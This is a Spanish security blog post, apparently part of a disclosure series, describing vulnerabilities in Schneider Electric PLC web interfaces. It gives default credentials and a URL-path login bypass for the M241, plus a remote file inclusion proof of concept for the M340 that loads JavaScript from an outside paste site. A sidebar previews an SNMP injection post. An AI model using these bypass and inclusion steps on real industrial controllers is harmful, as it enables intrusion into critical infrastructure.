[repost] MÚLTIPLES VULNERABILIDADES ( ICS ) - SCHNEIDER ELECTRIC - 2

Continuando con el articulo anterior en donde dentro del mundo de las ICS, me centro en los PLC.
Sin mas preámbulos ahora llega el turno de  presentar algunas de sus vulnerabilidades.





Vulnerabilidades detectadas: 
vendor: Schneider Electric


BYPASS LOGIN FORM


DeviceTM241CE24R  ( m241 ) 

Manual-pdf 

CAD: http://www.tracepartsonline.net/(S(ldnjvdybvfeogwc4hri4rro4))/partdetails.aspx?Class=SCHNEIDER_ELECTRIC&ACPD=1&FPartTab=VW3D&FPartTabsToH=PROD|DOCS|TDOCS|VW2D&PartFamilyID=10-03062014-103053&PartID=10-03062014-103053&sk_Reference=TM241CE24R

TM241.jpg
Este modelo (como la mayoría) cuenta con un servicio web embebido, corriendo por defecto en el puerto 80. Instantáneamente cuando uno accede a la aplicación web, automáticamente se encuentra con un login form. 

Lo cual esta perfecto, salvo por un par de interesantes curiosidades:

Al margen de que en la gran mayoría de los casos  encontrados, las credenciales serán las del manual. 'USER:USER'

Cuando tenemos de frente al formulario, el 'username' ya esta escrito. Esto es fatal, el posible atacante ya tiene parte del trabajo resuelto.


Pero pongamos por caso que justo nos topamos con dispositivo de estos con el password cambiado.
Cuando intentemos y fracasamos...

El mecanismo que un atacante tiene para evadir este sistema de seguridad es tan simple como cambiar el path de la url. de '/login.htm' a '/index2.htm'. Y estamos adentro....



REMOTE FILE INCLUSION

Ahora cambiamos de PLC y pasamos al Modelo M340. Ahora con su aplicación web vulnerable a RFI.



Un RFI trata sobre sobre aplicaciones web que permiten la inclusión de archivos situados en servidores remotos. La vulnerabilidad radica en la posibilidad de incluir archivos contenidos en aplicaciones web controladas por algún atacante, dando la posibilidad de ejecutar código malicioso en la app vulnerable.

Se explota modificando la URL apuntando a archivos remotos.

Paths vulnerable:
http://<ip-PLC>/html/english/home/index.htm?<RFI>

POC1: 
Web con código JS: http://paste.c99.nl/faef903ef5369657240e.html

code JS:  alert('[ [ POC ] \n malicious code JS');

http://<PLC>/html/english/home/index.htm?http://paste.c99.nl/faef903ef5369657240e.html


Pero tmb


y que su imaginación vuele...



Saludos,
@Capitan_Alfa

Comentarios

Publicar un comentario

Entradas populares de este blog

[repost] MÚLTIPLES VULNERABILIDADES ( ICS ) - SCHNEIDER ELECTRIC - 6

Imagen
  Tratando con servicios SNMP, durante un tiempo me  plantee como poder 'Sacarle Jugo' a aquellos OID, con privilegios de escritura.  Y de esa inquietud nace lo que mas tarde nombre con el nombre de ' Cross Protocol Injection '. Pero de antes de hablar de Vulnerabilidades y otras hierbas, algunas aclaraciones: SNMP - WALK  & SET - Por norma general al dar con servicios SNMP con ' community ' como ' private ' nos encontraremos ante la POSIBILIDAD de setear ciertos string. En la mayoría de estos casos, se podrá editar aquellos campos  ubicados en los siguientes OID: iso.3.6.1.2.1.1.4.0   ( System Contact  )  iso.3.6.1.2.1.1.5.0   ( System Name     )  iso.3.6.1.2.1.1.6.0   ( System Location ) 
Leer más